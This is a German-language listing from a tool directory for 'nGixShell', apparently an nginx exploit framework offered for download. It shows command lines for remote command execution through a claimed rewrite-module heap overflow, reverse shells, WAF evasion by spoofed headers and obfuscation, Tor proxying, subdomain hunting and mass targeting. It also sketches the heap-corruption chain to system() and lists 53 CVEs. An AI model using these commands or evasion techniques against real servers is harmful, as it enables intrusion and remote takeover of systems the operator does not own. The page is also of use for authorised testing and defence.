Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nGixshell — nginx CVE-Scanner + RCE-Exploit-Framework (CVE-2026-42945 + 16 weitere) | Kitploit
Tools/GitHubGitHub/mateusverass/ngixshell
AufklärungSchwachstellenscannerExploit-FrameworksWebanwendungs-ExploitationWAF-UmgehungWebsicherheitPenetrationstestsCommand and ControlSubdomain-EnumerationRed TeamingPayload-Entwicklung
218vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE-Scanner + RCE-Exploit-Framework (CVE-2026-42945 + 16 weitere)

Repository anzeigen
Teilen
nGixShell

Python CVEs Zero deps License


nGixShell ist ein nginx-CVE-Scanner und RCE-Exploit-Framework. Es enthält einen funktionsfähigen Proof-of-Concept für CVE-2026-42945 – einen kritischen Heap-Buffer-Overflow in ngx_http_rewrite_module – sowie einen Scanner, der 53 nginx-CVEs mit automatisierten HTTP-Probes, Fingerprinting, WAF-Erkennung/Umgehung, Web-Security-Auditing und Report-Erstellung abdeckt.

Keine externen Abhängigkeiten. Reine Python-3-Standardbibliothek.


Kurzstart

root@kitploit:~
# Das verwundbare Labor starten
docker compose -f env/docker-compose.yml up -d

# Automatik-Modus – Fingerprinting + CVE-Scan + Web-Audit
python3 ngixshell.py 127.0.0.1:19321

# Einen Befehl via RCE ausführen (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Eine Reverse-Shell einrichten (IP wird automatisch erkannt)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF erkennen und umgehen, dann scannen
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain-Scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Mehrere Ziele aus einer Datei
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Keine Flags erforderlich – die Ausrichtung des Tools auf ein Ziel führt alles automatisch aus.
TLS wird automatisch erkannt. nginx wird selbst bei server_tokens off ge-fingerprinted.


Verwendung

root@kitploit:~
python3 ngixshell.py [ZIEL] [OPTIONEN]

ZIEL-Formate:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modi

WAF-Erkennung & Umgehung

FlagBeschreibung
--waf-detectWAF vor dem Scan erkennen
--waf-bypassAlle Umgehungstechniken aktivieren (führt auch Erkennung aus)
--waf-ip IPDiese IP in Umgehungs-Headern vortäuschen (Standard: zufällige RFC1918)

Umgehungstechniken (alle aktiv, wenn --waf-bypass gesetzt ist):

Erkannte WAFs: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Web-Audit

Wird im Scan-Modus automatisch ausgeführt. Alle Module können einzeln übersprungen werden.

  • Header-Audit – HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, versionsleakende Header
  • Pfad-Erkennung – 50+ Pfade; Sentinel-Probe eliminiert Fehlalarme durch Catch-all-403/301-Regeln
  • Virtual-Host-Aufzählung – erfordert sowohl Status- als auch Body-Unterschied, um Fehlalarme durch Standard-Blockierungen zu vermeiden
  • TLS-Audit – Testet TLS 1.0–1.3 Unterstützung, Zertifikatsablauf und Selbstsignierungs-Erkennung
  • stub_status – Analysiert aktive Verbindungsmetriken von /nginx_status, falls freigegeben

Verbindung

FlagBeschreibung
--port PORTPort überschreiben
--tls

HTTP

FlagBeschreibung
--user-agent UABenutzerdefinierter User-Agent
--auth USER:PASSHTTP-Basisauthentifizierung

Rate / Timing

FlagBeschreibung
--rate-limit RPSMaximale Anfragen pro Sekunde
--jitter MS

Ausgabe

FlagBeschreibung

CVE-Abdeckung

53 Einträge von 2009–2026. Sortiert nach CVSS.


Der Bug (CVE-2026-42945)

Die Rewrite-Script-Engine von nginx verwendet ein Zwei-Durchgangs-Modell: Puffergröße berechnen, dann kopieren. Das Flag is_args wird auf der Haupt-Engine gesetzt, wenn ein rewrite-Ersatz ? enthält, aber der Längenberechnungsdurchlauf läuft auf einer frisch genullten Sub-Engine:

  • Längendurchlauf – sieht is_args = 0 → gibt rohe Erfassungslänge zurück
  • Kopierdurchlauf – sieht is_args = 1 → ruft ngx_escape_uri(NGX_ESCAPE_ARGS) auf, erweitert jedes unsichere Byte auf 3 Bytes

Der Kopiervorgang überläuft den zu kleinen Heap-Puffer mit angreifergesteuerten URI-Daten. Die Ausnutzung korrumpiert einen benachbarten ngx_pool_t-Cleanup-Zeiger über Cross-Request-Heap-Feng-Shui und leitet ihn zu einer gefälschten ngx_pool_cleanup_s um, die bei der Pool-Zerstörung system() aufruft.

Betroffene Versionen

ProduktVerwundbarGefixt
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

Herstellerhinweis: https://my.f5.com/manage/s/article/K000160932


Labor-Setup

Getestet auf Ubuntu 24.04 LTS. Erfordert Docker und Python 3.8+.

root@kitploit:~
# Das verwundbare Labor starten (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Vollständiger Scan
python3 ngixshell.py 127.0.0.1:19321

# RCE mit JSON-Ausgabe
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse-Shell – Bash-Payload, automatisches PTY-Upgrade
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF-Bypass-Scan mit vorgetäuschter IP
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Über SOCKS5-Proxy
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Subdomain-Scan mit Ratenbegrenzung
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Mehrere Ziele, JSON-Ausgabe, HTML-Report
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Haftungsausschluss

Nur für autorisierte Sicherheitstests, CTF-Wettbewerbe und Forschung.

Tool herunterladen
FlagBeschreibung
(kein)Auto – Fingerprinting + CVE-Scan + Web-Audit
--cmd 'CMD'Befehl via CVE-2026-42945 RCE ausführen
--cmd-file DATEIBefehle aus Datei ausführen (mit ; verbunden)
--shellEine Reverse-Shell starten
--shell-type TYPPayload: bash python perl php nc powershell (Standard: python)
--upgrade-shellAutomatisch PTY-Upgrade nach Shell-Verbindung senden
--subdomain-scan DOMAINVerwundbares nginx auf Subdomains finden
--cve CVE-IDEine bestimmte CVE testen
--list-cvesAlle 53 CVEs mit CVSS und Probe-Info ausgeben
--list-candidatesHeap-Adress-Kandidaten ausgeben
--dry-runNur Fingerprinting + Scan, kein Exploit
--target-file DATEIMehrere Hosts aus einer Datei scannen
TechnikDetail
IP-SpoofingX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA-Rotation11 echte Browser-/Bot-User-Agents, pro Anfrage zufällig
PfadverschleierungDoppelslash, /./-Padding, Prozentkodierung, Groß-/Kleinschreibungsvariation
Header-Case-ShuffleZufällige Groß-/Kleinschreibung der Header-Namen, um WAF-Mustererkennung zu brechen
FlagBeschreibung
--skip-headersHTTP-Sicherheitsheader-Audit überspringen
--skip-pathsPfad-/Datei-Erkennung überspringen
--skip-vhostsVirtual-Host-Aufzählung überspringen
--skip-tlsTLS-Protokoll-Audit überspringen
--path-wordlist DATEIZusätzliche zu prüfende Pfade (einer pro Zeile)
TLS erzwingen (wird standardmäßig automatisch erkannt)
--proxy URLProxy: http://, https://, socks5://
--cookie WERTCookie-Header
--header NAME:WERTZusätzlicher Header (wiederholbar)
Zufällige Verzögerung 0–MS ms zwischen Anfragen
--retry NUnklare Probes wiederholen (Standard: 1)
--timeout-multiplier XAlle Timeouts skalieren (Standard: 1.0)
--output DATEI
Log in DATEI schreiben
--jsonJSON-Zusammenfassung am Ende ausgeben
--html-report [DATEI]HTML-Report generieren (Standard: ngixshell_<host>_<ts>.html)
--verboseDebug-Ausgabe
CVECVSSKomponenteBeschreibung
CVE-2026-429459,8 KRITISCHrewriteHeap-Overflow → RCE (ausgenutzt)
CVE-2026-429468,1 HOCHrewriteSpeicherkorruption (gleiche Sicherheitsmeldung)
CVE-2022-417417,8 HOCHmp4Speicherkorruption via bösartigem mp4
CVE-2016-12477,8 HOCHpackagingSymlink-Privilegieneskalation über Logdatei
CVE-2021-230177,7 HOCHresolverOff-by-One-Heap-Überschreibung
CVE-2026-407017,5 HOCHrequestSpeicherkorruption in der Anfrageverarbeitung
CVE-2026-429347,5 HOCHrequestSpeicherkorruption (gleiche Sicherheitsmeldung)
CVE-2026-277847,5 HOCHmp4Pufferüberlauf via manipuliertem mp4
CVE-2026-326477,5 HOCHmp4Pufferüberlauf (verwandt mit obigem)
CVE-2024-249907,5 HOCHHTTP/3Use-after-free im QUIC-Modul
CVE-2024-249897,5 HOCHHTTP/3NULL-Pointer-Dereferenzierung in QUIC
CVE-2024-310797,5 HOCHHTTP/3Stack-Overflow im QUIC-Encoder
CVE-2024-327607,5 HOCHHTTP/3Pufferüberschreibung via HEADERS-Frame
CVE-2022-417427,5 HOCHmp4Heap-Speicher-Offenlegung
CVE-2017-75297,5 HOCHrange filterInteger-Überlauf → Out-of-bounds-Lesen
CVE-2016-07467,5 HOCHresolverUse-after-free via manipulierter DNS-Antwort
CVE-2014-01337,5 HOCHSPDYHeap-Overflow in der SPDY-Implementierung
CVE-2014-00887,5 HOCHSPDYSpeicherkorruption in SPDY
CVE-2013-45477,5 HOCHcoreLeerzeichen+NUL-URI-Bypass
CVE-2013-20287,5 HOCHcoreChunked-Encoding-Stack-Overflow
CVE-2012-11807,5 HOCHproxyUse-after-free im Proxy-Modul
CVE-2009-35557,5 HOCHSSLTLS-Neuverhandlungsinjektion (MITM)
CVE-2009-26297,5 HOCHcorePuffer-Unterlauf in der URI-Analyse
CVE-2026-429266,5 MITTELHTTP/2Request-Splitting via Proxy
CVE-2026-276546,5 MITTELWebDAVHeap-Overflow im DAV-Modul
CVE-2026-287536,5 MITTELmailHeader-Injektion im Mail-Proxy
CVE-2026-16426,5 MITTELproxySSL-Upstream-Session-Reuse-Leak
CVE-2019-95116,5 MITTELHTTP/2Data-Dribble-CPU/Memory-DoS
CVE-2012-20896,8 MITTELmp4Pufferüberlauf via mp4-Anfrage
CVE-2018-168455,5 MITTELmp4Integer-Unterlauf → Absturz + Offenlegung
CVE-2019-203725,3 MITTELproxyHTTP-Request-Schmuggel
CVE-2026-404605,3 MITTELHTTP/3QUIC-Verbindungsspoofing
CVE-2026-287555,3 MITTELSSLSpeicher-Offenlegung in der OCSP-Verarbeitung
CVE-2025-234195,3 MITTELSSLTLS-Sitzungswiederaufnahme-Zertifikatsumgehung
CVE-2024-352005,3 MITTELHTTP/3NULL-Pointer-Dereferenzierung
CVE-2024-341615,3 MITTELHTTP/3Speicher-Offenlegung
CVE-2016-44505,3 MITTELcoreNULL-Pointer via chunked Request-Body
CVE-2016-07425,0 MITTELresolverUngültiger Pointer via manipuliertem UDP-Paket
CVE-2016-07475,0 MITTELresolverUnzureichendes CNAME-Auflösungslimit
CVE-2014-35565,0 MITTELmailSTARTTLS-Befehlsinjektion
CVE-2013-20705,3 MITTELproxyBackend-Antwort-Offenlegung
CVE-2011-49635,0 MITTELaccessIPv6-Literal-Zugriffskontrollumgehung
CVE-2011-43155,0 MITTELresolverHeap-Overflow via manipulierter DNS-Antwort
CVE-2009-38965,0 MITTELcoreNULL-Pointer-Dereferenzierung DoS
CVE-2025-538594,3 MITTELmailSMTP-Befehlsinjektion
CVE-2014-36164,3 MITTELSSLTLS-SNI-Virtual-Host-Verwirrung
CVE-2026-276514,3 MITTELmailNULL-Pointer-Dereferenzierung im Mail-Proxy
CVE-2019-95134,3 MITTELHTTP/2Resource-Loop-CPU-DoS
CVE-2019-95164,3 MITTELHTTP/20-Length-Headers-Speichererschöpfung
CVE-2018-168434,3 MITTELHTTP/2Übermäßiger Speicherverbrauch
CVE-2018-168444,3 MITTELHTTP/2Übermäßige CPU via SETTINGS-Frames
CVE-2024-73474,7 MITTELmp4Out-of-bounds-Lesen
CVE-2009-38984,9 MITTELWebDAVDirectory-Traversal via COPY/MOVE